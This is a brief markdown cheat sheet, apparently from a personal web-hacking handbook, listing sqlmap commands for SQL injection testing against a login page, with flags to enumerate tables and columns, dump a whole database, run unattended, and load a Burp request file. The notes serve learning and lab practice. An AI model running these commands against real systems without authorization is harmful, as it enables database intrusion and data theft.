handbook/tools/3.Web-Hacking/4.Injection/SQL/Tools/SQLmap.md
2024-08-31 01:07:22 +02:00

1,004 B

Top Commands

SQLmap (URL)

sqlmap --url http://tbfc.net/login.php --tables --columns
  • --tables ---> Check tables

  • --columns ---> Check columns

  • --url = Provide URL for the attack

  • --dbms = Tell SQLMap the type of database that is running

  • --dump = Dump the data within the database that the application uses

  • --dump-all = Dump the ENTIRE database

  • --batch = SQLMap will run automatically and won't ask for user input

SQLmap(BurpSuite ---> Very Good)

sqlmap -r filename

All Information ---> https://github.com/sqlmapproject/sqlmap